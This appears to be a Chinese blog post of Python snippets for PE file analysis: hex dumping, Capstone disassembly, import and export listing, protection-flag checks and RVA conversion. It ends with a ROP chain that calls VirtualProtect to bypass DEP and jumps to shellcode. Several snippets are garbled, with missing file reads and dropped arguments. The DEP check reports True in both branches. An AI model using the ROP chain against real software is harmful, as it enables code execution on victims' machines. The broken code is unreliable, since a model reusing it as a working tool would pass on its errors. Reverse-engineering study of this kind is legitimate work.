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十六进制转换器 可自行添加上,文件与偏移对应关系,即可实现指定位置的数据转换,这里给出坑爹版实现,自己晚膳吧。

#coding:utf-8 import os,sys import binascii # binascii.a2b_hex("4d") if __name__ == "__main__": count = 0 size = os.path.getsize("qq.exe") print("文件指针: {}".format(size)) fp = open("qq.exe","rb") lis = [] for item in range(500): char = count = count + 1 if count % 16 == 0: if ord(char) < 16: print("0" + hex(ord(char))[2:]) else: print(hex(ord(char))[2:]) else: if ord(char) < 16: print("0" + hex(ord(char))[2:] + " ",end="") else: print(hex(ord(char))[2:] + " ",end="")


import os def to_ascii(h): list_s = [] for i in range(0, len(h), 2): list_s.append(chr(int(h[i:i+2], 16))) return ''.join(list_s) def to_hex(s): list_h = [] for c in s: list_h.append(hex(ord(c))[2:]) return ''.join(list_h) with open("d://run.exe","rb") as fp: lis = [] for x in range(10240): for i in range(64): char = print(to_ascii(hex(ord(char))[2:]),end="") print("")


import os from capstone import * CODE = b"\x55\x8b\xec\x6a\x00\xff\x15\x44\x30\x11\x00" md = Cs(CS_ARCH_X86, CS_MODE_32) for i in md.disasm(CODE, 0x1000): print("大小: %3s 地址: %-5s 指令: %-7s 操作数: %-10s"% (i.size,i.address,i.mnemonic,i.op_str)) print("*" * 100) CODE64 = b"\x55\x48\x8b\x05\xb8\x13\x00\x00\xe9\xea\xbe\xad\xde\xff\x25\x23\x01\x00\x00\xe8\xdf\xbe\xad\xde\x74\xff" md = Cs(CS_ARCH_X86, CS_MODE_64) for i in md.disasm(CODE64, 0x1000): print("大小: %3s 地址: %-5s 指令: %-7s 操作数: %-10s"% (i.size,i.address,i.mnemonic,i.op_str))

读取pE结构的代码 读取导入导出表,用Python 实在太没意思了,请看C/C++ 实现PE解析工具笔记。

def ScanImport(filename): pe = pefile.PE(filename) print("-" * 100) try: for x in pe.DIRECTORY_ENTRY_IMPORT: for y in x.imports: print("[*] 模块名称: %-20s 导入函数: %-14s" %((x.dll).decode("utf-8"),("utf-8"))) except Exception: pass print("-" * 100) def ScanExport(filename): pe = pefile.PE(filename) print("-" * 100) try: for exp in pe.DIRECTORY_ENTRY_EXPORT.symbols: print("[*] 导出序号: %-5s 模块地址: %-20s 模块名称: %-15s" %(exp.ordinal,hex(pe.OPTIONAL_HEADER.ImageBase + exp.address),("utf-8"))) except: pass print("-" * 100)


# 随机基址 => hex(pe.OPTIONAL_HEADER.DllCharacteristics) & 0x40 == 0x40 if( (pe.OPTIONAL_HEADER.DllCharacteristics & 64)==64 ): print("基址随机化: True") else: print("基址随机化: False") # 数据不可执行 DEP => hex(pe.OPTIONAL_HEADER.DllCharacteristics) & 0x100 == 0x100 if( (pe.OPTIONAL_HEADER.DllCharacteristics & 256)==256 ): print("DEP保护状态: True") else: print("DEP保护状态: True") # 强制完整性=> hex(pe.OPTIONAL_HEADER.DllCharacteristics) & 0x80 == 0x80 if ( (pe.OPTIONAL_HEADER.DllCharacteristics & 128)==128 ): print("强制完整性: True") else: print("强制完整性: False") if ( (pe.OPTIONAL_HEADER.DllCharacteristics & 1024)==1024 ): print("SEH异常保护: False") else: print("SEH异常保护: True")


import os import pefile def RVA_To_FOA(FilePath): pe = pefile.PE(FilePath) ImageBase = pe.OPTIONAL_HEADER.ImageBase for item in pe.sections: if str(item.Name.decode('UTF-8').strip(b'\x00'.decode())) == ".text": #print("虚拟地址: 0x%.8X 虚拟大小: 0x%.8X" %(item.VirtualAddress,item.Misc_VirtualSize)) VirtualAddress = item.VirtualAddress VirtualSize = item.Misc_VirtualSize ActualOffset = item.PointerToRawData StartVA = hex(ImageBase + VirtualAddress) StopVA = hex(ImageBase + VirtualAddress + VirtualSize) print("[+] 代码段起始地址: {} 结束: {} 实际偏移:{} 长度: {}".format(StartVA,StopVA,ActualOffset,VirtualSize)) with open(FilePath,"rb") as fp: HexCode = print(HexCode) RVA_To_FOA("d://lyshark.exe")


rop = struct.pack ('<L',0x7c349614) # ret rop += struct.pack('<L',0x7c34728e) # pop eax rop += struct.pack('<L',0xfffffcdf) # rop += struct.pack('<L',0x7c379c10) # add ebp,eax rop += struct.pack('<L',0x7c34728e) # pop eax rop += struct.pack('<L',0xfffffdff) # value = 0x201 rop += struct.pack('<L',0x7c353c73) # neg eax rop += struct.pack('<L',0x7c34373a) # pop ebx rop += struct.pack('<L',0xffffffff) # rop += struct.pack('<L',0x7c345255) # inc ebx rop += struct.pack('<L',0x7c352174) # add ebx,eax rop += struct.pack('<L',0x7c344efe) # pop edx rop += struct.pack('<L',0xffffffc0) # 0x40h rop += struct.pack('<L',0x7c351eb1) # neg edx rop += struct.pack('<L',0x7c36ba51) # pop ecx rop += struct.pack('<L',0x7c38f2f4) # &writetable rop += struct.pack('<L',0x7c34a490) # pop edi rop += struct.pack('<L',0x7c346c0b) # ret (rop nop) rop += struct.pack('<L',0x7c352dda) # pop esi rop += struct.pack('<L',0x7c3415a2) # jmp [eax] rop += struct.pack('<L',0x7c34d060) # pop eax rop += struct.pack('<L',0x7c37a151) # ptr to virtualProtect() rop += struct.pack('<L',0x625011ed) # jmp esp


反汇编 Python

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